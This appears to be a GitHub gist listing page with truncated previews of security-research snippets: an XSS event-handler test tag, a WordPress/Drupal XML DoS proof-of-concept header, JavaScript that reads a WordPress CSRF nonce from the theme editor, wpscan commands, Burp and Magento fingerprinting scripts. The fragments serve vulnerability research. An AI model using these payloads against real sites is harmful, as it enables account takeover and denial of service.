This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
chrome://-alkuisissa | |
chrome://-nettadresser | |
chrome://-webbadresser | |
chrome://ChromeTestChromeWebUIControllerFactory | |
chrome://DummyURL | |
chrome://URLs | |
chrome://about | |
chrome://accessibility | |
chrome://anything | |
chrome://app-list |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################################################################# | |
# CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS# | |
# Author: Nir Goldshlager - Salesforce.com Product Security Team# | |
# This is a Proof of Concept Exploit, Please use responsibly.# | |
################################################################################# | |
#!/usr/bin/env python | |
from __future__ import print_function | |
import threading | |
import time | |
import urllib |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var wpnonce = ''; | |
function getCSRFNonce(callback) | |
{ | |
var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/ | |
var xhr = new XMLHttpRequest(); | |
xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true); | |
xhr.withCredentials = true; | |
xhr.overrideMimeType('text/xml'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
loadedstart | |
onabort | |
onafterprint | |
onanimationend | |
onanimationiteration | |
onanimationstart | |
onautocomplete | |
onautocompleteerror | |
onbeforecopy | |
onbeforecut |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Get your API token from wpvulndb.com if you also want the vulnerabilities associated with the detected plugin displaying. | |
For all plugins with known vulnerabilities: | |
wpscan --url example.com -e vp --plugins-detection mixed --api-token YOUR_TOKEN | |
For all plugins in our database (could take a very long time): | |
wpscan --url example.com -e ap --plugins-detection mixed --api-token YOUR_TOKEN |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if ( !function_exists('wp_generate_auth_cookie') ) : | |
/** | |
* Generate authentication cookie contents. | |
* | |
* @since 2.5.0 | |
* | |
* @param int $user_id User ID | |
* @param int $expiration Cookie expiration in seconds |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
java_import 'burp.IBurpExtender' | |
java_import 'burp.IScannerCheck' | |
java_import 'burp.IScanIssue' | |
require 'java' | |
java_import 'java.util.Arrays' | |
java_import 'java.util.ArrayList' | |
# | |
# You will need to download JRuby's Complete.jar file from http://jruby.org/download and configure Burp Extender with its path. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
require 'typhoeus' | |
require 'json' | |
require 'uri' | |
require 'digest/md5' | |
# https://raw.githubusercontent.com/gwillem/magento-version-identification/master/version_hashes.json | |
target = ARGV[0] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
> select id from vulnerabilities where poc != ''; | |
+------+ | |
| id | | |
+------+ | |
| 6028 | | |
| 6219 | | |
| 6499 | | |
| 6548 | | |
| 7680 | | |
| 7710 | |
NewerOlder